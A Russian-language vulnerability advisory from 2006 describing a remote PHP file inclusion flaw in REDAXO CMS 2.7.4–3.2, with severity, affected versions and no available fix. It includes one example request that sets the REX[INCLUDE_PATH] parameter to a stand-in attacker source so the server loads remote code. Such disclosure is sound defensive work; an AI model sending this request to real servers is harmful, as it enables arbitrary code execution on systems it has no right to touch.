PHP-инклюдинг в REDAXO

Дата публикации:
08.06.2006
Всего просмотров:
4130
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
REDAXO 2.x
Уязвимые версии: REDAXO 2.7.4, 3.0, 3.1, 3.2, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "REX[INCLUDE_PATH]" в различных сценариях. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

./redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]=attacker

URL производителя: www.redaxo.de

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Redaxo CMS <= 3.2 (INCLUDE_PATH) Remote File Include Vulnerabilities

или введите имя

CAPTCHA